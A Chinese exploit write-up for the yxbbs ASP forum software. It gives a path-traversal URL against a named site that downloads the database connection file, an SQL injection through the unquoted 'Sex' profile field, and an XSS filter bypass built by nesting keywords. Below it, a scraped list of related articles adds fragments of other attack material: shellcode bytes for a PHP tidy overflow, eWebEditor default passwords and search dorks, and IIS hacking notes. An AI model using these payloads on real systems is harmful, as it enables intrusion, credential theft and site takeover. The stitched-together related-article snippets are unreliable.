小议yxbbs漏洞利用代码_漏洞研究

1、任意文件下载漏洞.

漏洞文件: ViewFile.asp

Function ChkFile(FileName) 
Dim Temp,FileType,F 
ChkFile=false 
FileType=Lcase(Split(FileName,".")(ubound(Split(FileName,".")))) 
Temp="|asp|aspx|cgi|php|cdx|cer|asa|" 
If Instr(Temp,"|"&FileType"|")>0 Then ChkFile=True 
F=Replace(Request("FileName"),".","") 
If instr(1,F,chr(39))>0 or instr(1,F,chr(34))>0 or instr(1,F,chr(59))>0 then ChkFile=True 
End Function 

在检查下载文件类型时只判断不是那几种类型就可以下载。
因此存在漏洞,我们可构造这样的下载
http://www.yimxu.com/bbs/ViewFile.asp?filename=../../inc/conn.asp%20
注意,后面加多个%20, 代表空格。

2、SQL注入漏洞
漏洞文件:Usersetup.Asp

SaveMyInfo()
注意到
Sex=YxBBs.Fun.GetStr("Sex") 
QQ=YxBBs.Fun.GetStr("QQ") 
IsQQpic=YxBBs.Fun.GetStr("IsQQpic") 

Public Function GetStr(Str) 
Str = Trim(Request.Form(Str)) 
If IsEmpty(Str) Then 
Str = "" 
Else 
Str = Replace(Str,"{","{") 
Str = Replace(Str,"}","}") 
Str = Replace(Str,"'","'") 
Str = Replace(Str,"|","|") 
End If 
GetStr = Trim(Str) 
End Function 

只过虑 ' { } | 等,但

YxBBs.execute("update [YX_User] set Birthday='"&Birthday"',Sex="&Sex",PicW="&PicW", 
PicH="&PicH",Mail='"&Mail"',QQ='"&QQ"',Honor='"&Honor"',Pic='"&PicUrl"', 
Home='"&Home"',Sign='"&Sign"',IsQQpic="&IsQQpic" where name='"& 
YxBBs.MyName"' And Password='"&YxBBs.MyPwd"'") 

Sex="&Sex&",
可以看到,Sex 可以构造成 1,SQL注入语句… 对于asscee 数据库影响不太,但SQL语句影响很大.

3、多处跨站漏洞
函数

 Public Function ubbg(str) 
Dim re 
Set re=new RegExp 
re.IgnoreCase=true 
re.Global=True 
re.Pattern="((javascript:)|(<)|(>)|(height)|(width)|(jscript:)|(object)|(script)|(js:)|(vbscript:)| 
(vbs:)|(\.value)|(about:)|(file:)|(document.cookie)|(on(mouse|Exit|error|click|key|load)))" 
str=re.Replace(str,"") 
re.Pattern="()" 
str=re.Replace(str,"&#") 
Set re=Nothing 
ubbg=str 
End Function 

因为过虑为空,所以可以这样构造

(javas(object)cript:)

过虑后就成了 javascript:

就说到这里.

时间: 2024-07-31 19:34:34

小议yxbbs漏洞利用代码_漏洞研究的相关文章

伯乐asp收信程序漏洞及利用程序利用代码_漏洞研究

http://forum.eviloctal.com/thread-32151-1-1.html  之后又有会员PM我..加上事过已久..也不是什么保密的东西了..网上也许到处都是了..就考虑把东西发出来..算是个学习吧..  伯乐的收信程序(针对以前的老版本.后来修补了这个漏洞)  主数据库名第一次使用设置时是随机产生的..但因为他是通用收信程序..可以截获密保..  mibao.asp文件对提交的参数没有任何过滤  复制代码 代码如下: if action="put" then  

Dedecms getip()的漏洞利用代码_安全教程

author: superhei team:http://www.ph4nt0m.org blog:http://superhei.blogbus.com 在用户登陆后把用户信息写如了缓存:\include\inc_memberlogin.php function FushCache($mid=0) { if(empty($mid)) $mid = $this->M_ID; $dsql = new DedeSql(); $row = $dsql->GetOne("Select ID,

eWebSoft在线编辑器漏洞利用技巧_漏洞研究

现在eWebSoft在线编辑器用户越来越多,  危害就越来越大~  转载标明:  作者:badwolf  出处:坏狼安全网  http://www.winshell.cn/  首先介绍编辑器的一些默认特征:  默认登陆admin_login.asp  默认数据库db/ewebeditor.mdb   默认帐号admin 密码admin或admin888  搜索关键字:"inurl:ewebeditor" 关键字十分重要  有人搜索"eWebEditor - eWebSoft在

PHP 5.2.3 tidy扩展本地溢出漏洞利用代码_安全教程

复制代码 代码如下: <?php  if (!extension_loaded("tidy")){die("you need Tidy extension loaded!");}  $scode =  "\xfc\xbb\xc7\xc4\x05\xc9\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85".  "\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x3b\x2c\x

《Metasploit渗透测试手册》—第8章8.3节常用的漏洞利用代码mixins

8.3 常用的漏洞利用代码mixins Metasploit渗透测试手册 Mixins是Ruby语言中应用广泛的一种机制,其作用是将一些功能放置到模块中,并使得Ruby这种单继承语言具备多继承的能力.在漏洞利用代码模块中使用mixins,有助于调用该漏洞利用代码所需的不同函数.在本节中,我们将学习一些重要的Metasploit exploit mixins. 怎样实现 下面快速浏览一些常用的exploit mixins,然后在现有的漏洞利用代码模块中了解其实现机理. Exploit::Remot

《Metasploit渗透测试手册》—第8章8.6节移植并测试新的漏洞利用代码模块

8.6 移植并测试新的漏洞利用代码模块 Metasploit渗透测试手册 在上节中学习了怎样使用可用的概念验证代码开发完整的Metasploit模块,本节中将把该模块保存到合适的位置,并测试其是否正常运转. 准备 了解漏洞利用代码模块要存储的文件夹位置是非常重要的,有助于追踪不同模块所在位置,同时也有助于Metasploit框架理解模块的基本用法.完整的模块脚本构建完成之后,在合适的位置将其保存. 怎样实现 由于上面开发的是漏洞利用代码模块,针对的目标是Windows操作系统,影响的是特定的文件

《Metasploit渗透测试手册》—第8章8.5节 将漏洞利用代码转换为Metasploit模块

8.5 将漏洞利用代码转换为Metasploit模块 Metasploit渗透测试手册 在前面的内容中已介绍了如何使用漏洞利用代码模块来攻陷目标机器.在本节中,我们将进一步拓展模块使用体验,尝试使用可用的概念验证代码开发完整的漏洞利用代码模块.为了将任意新的漏洞利用代码转换为框架中的模块,并在Metasploit团队进行更新之前使用其进行渗透测试,必须掌握将漏洞利用代码转换为模块的相关知识.并且,每个漏洞利用代码都以框架中模块形式存在也是不可能的,所以,下面学习怎样使用可用的POC来构建自己的漏

几十个字符的漏洞利用代码 即可绕过苹果系统的安全机制

苹果最新发布的 OS X 10.11.4 和 iOS 9.3 更新中,一个权限提升的漏洞补丁是无效的,导致1.3亿苹果用户面临黑客攻击的危险.     这个权限提升漏洞是上周曝出的,存在于苹果流行的"系统完整性保护"(SIP)安全机制中,影响所有版本的 OS X 操作系统.事后苹果紧急发布补丁,补上了大部分系统中的漏洞,但在上述两种系统中SIP还是可以被绕过,并被用来远程劫持用户的设备. 德国的一位安全研究者,Stefano Esser,于3月28日在推特上发布了一段只有几十个字符的漏

IIS漏洞整理大全_漏洞研究

去年下半年关于IIS的漏洞层出不穷,鉴于目前IIS的广泛使用,觉得有必要把收集的资料加以总结一下.  1.介绍  这里介绍的方法主要通过端口80来完成操作,具有很大的威胁性,因为作为网络服务器80端口总要打开的.如果想方便一些,下载一些WWW.CGI扫描器来辅助检查.  而且要知道目标机器运行的是何种服务程序,你可以使用以下命令:  telnet <目标机> 80  GET HEAD / HTTP/1.0  就可以返回一些域名和WEB服务程序版本,如果有些服务器把WEB服务运行在8080,81